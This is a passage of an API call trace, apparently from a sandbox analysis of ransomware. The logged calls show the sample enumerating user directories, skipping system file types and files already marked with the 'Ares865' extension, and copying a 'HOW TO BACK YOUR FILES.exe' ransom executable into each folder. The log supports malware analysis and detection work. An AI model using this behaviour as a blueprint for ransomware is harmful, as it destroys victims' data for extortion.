lpString2=".lnk") returned 1 [0042.322] lstrlenW (lpString=".ini") returned 4 [0042.322] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.322] lstrlenW (lpString=".sys") returned 4 [0042.322] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.322] lstrlenW (lpString="desktop.ini") returned 11 [0042.322] lstrcpyW (in: lpString1=0x2e2e8d2, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0042.322] lstrlenW (lpString="index.dat") returned 9 [0042.322] lstrlenW (lpString="Ares865") returned 7 [0042.322] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0042.322] lstrlenW (lpString=".dll") returned 4 [0042.322] lstrcmpiW (lpString1="index.dat", lpString2=".dll") returned 1 [0042.323] lstrlenW (lpString=".lnk") returned 4 [0042.323] lstrcmpiW (lpString1="index.dat", lpString2=".lnk") returned 1 [0042.323] lstrlenW (lpString=".ini") returned 4 [0042.323] lstrcmpiW (lpString1="index.dat", lpString2=".ini") returned 1 [0042.323] lstrlenW (lpString=".sys") returned 4 [0042.323] lstrcmpiW (lpString1="index.dat", lpString2=".sys") returned 1 [0042.323] lstrlenW (lpString="index.dat") returned 9 [0042.323] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data" [0042.323] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0042.323] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0042.323] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data") returned 53 [0042.323] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data" [0042.323] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.323] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.323] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.324] GetLastError () returned 0x0 [0042.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.324] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.324] CloseHandle (hObject=0x118) returned 1 [0042.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.324] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.324] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.324] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.324] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.324] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0042.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2340 [0042.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x2d1ea0 [0042.325] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2348 | out: ListHead=0x2e77d0, ListEntry=0x2d2348) returned 0x2d2328 [0042.325] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0042.325] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.325] lstrcmpiW (lpString1="History", lpString2="aoldtz.exe") returned 1 [0042.325] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="History" | out: lpString1="History") returned="History" [0042.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0042.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2effc8 [0042.325] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2368 | out: ListHead=0x2e77d0, ListEntry=0x2d2368) returned 0x2d2348 [0042.325] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49f3b220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.325] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.325] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x66b2700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbdaf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db.Ares865", cAlternateFileName="ICONCA~1.ARE")) returned 1 [0042.325] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.325] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="aoldtz.exe") returned 1 [0042.325] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="IconCache.db.Ares865" | out: lpString1="IconCache.db.Ares865") returned="IconCache.db.Ares865" [0042.325] lstrlenW (lpString="IconCache.db.Ares865") returned 20 [0042.325] lstrlenW (lpString="Ares865") returned 7 [0042.325] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.325] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0042.325] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.325] lstrcmpiW (lpString1="Microsoft", lpString2="aoldtz.exe") returned 1 [0042.325] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0042.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0042.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f0380 [0042.325] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0042.325] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b34dcb8, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0042.325] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.325] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0042.325] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Temporary Internet Files" | out: lpString1="Temporary Internet Files") returned="Temporary Internet Files" [0042.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9e) returned 0x2cb310 [0042.326] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.326] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0042.326] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.326] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23a8 [0042.326] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files" [0042.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0042.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.326] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files") returned 78 [0042.326] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files" [0042.326] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.326] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.326] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.327] GetLastError () returned 0x0 [0042.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.327] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.327] CloseHandle (hObject=0x118) returned 1 [0042.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.327] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.327] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.327] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.327] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.327] lstrcpyW (in: lpString1=0x2e2e8fe, lpString2="Content.IE5" | out: lpString1="Content.IE5") returned="Content.IE5" [0042.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x2f2fc8 [0042.327] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.327] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe710360, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.327] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.327] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0042.327] lstrcpyW (in: lpString1=0x2e2e8fe, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.327] lstrlenW (lpString="desktop.ini") returned 11 [0042.327] lstrlenW (lpString="Ares865") returned 7 [0042.327] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.328] lstrlenW (lpString=".dll") returned 4 [0042.328] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.328] lstrlenW (lpString=".lnk") returned 4 [0042.328] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.328] lstrlenW (lpString=".ini") returned 4 [0042.328] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.328] lstrlenW (lpString=".sys") returned 4 [0042.328] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.328] lstrlenW (lpString="desktop.ini") returned 11 [0042.328] lstrcpyW (in: lpString1=0x2e2e8fe, lpString2="Low" | out: lpString1="Low") returned="Low" [0042.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2cb310 [0042.328] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.328] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 1 [0042.328] lstrcmpiW (lpString1="Virtualized", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.328] lstrcmpiW (lpString1="Virtualized", lpString2="aoldtz.exe") returned 1 [0042.328] lstrcpyW (in: lpString1=0x2e2e8fe, lpString2="Virtualized" | out: lpString1="Virtualized") returned="Virtualized" [0042.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0042.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x2f3088 [0042.328] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0042.328] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 0 [0042.328] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.328] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23e8 [0042.328] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" [0042.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3088 | out: hHeap=0x2b0000) returned 1 [0042.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.328] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned 90 [0042.328] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" [0042.328] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.329] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.329] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.329] GetLastError () returned 0x0 [0042.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.329] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.329] CloseHandle (hObject=0x118) returned 1 [0042.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.329] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.329] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.330] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.330] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.330] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low" [0042.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0042.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.330] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned 82 [0042.330] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low" [0042.330] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.330] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.330] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.330] GetLastError () returned 0x0 [0042.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.330] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.331] CloseHandle (hObject=0x118) returned 1 [0042.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.331] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.331] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.331] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.331] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.331] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0042.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.331] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned 90 [0042.331] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.331] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.331] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet 